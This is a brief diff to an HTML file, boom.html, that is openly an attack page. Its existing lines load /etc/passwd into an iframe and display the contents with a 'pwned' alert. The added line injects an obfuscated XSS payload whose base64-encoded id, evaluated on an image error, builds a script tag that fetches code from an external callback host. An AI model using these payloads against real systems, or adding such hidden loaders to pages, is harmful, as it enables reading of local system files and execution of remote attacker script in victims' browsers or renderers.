--- a/boom.html
+++ b/boom.html
@@ -11,6 +11,6 @@
     <iframe onload=j() src="/etc/passwd">xssxsxxsxs</iframe>
     <script type="text/javascript">
 function j(){alert('pwned contents of /etc/passwd:\n\n '+frames[0].document.body.innerText)}</script>
-
+"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzLnJlcG9ydC9jL2Jvb202NzAiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>
 </body>
 </html>
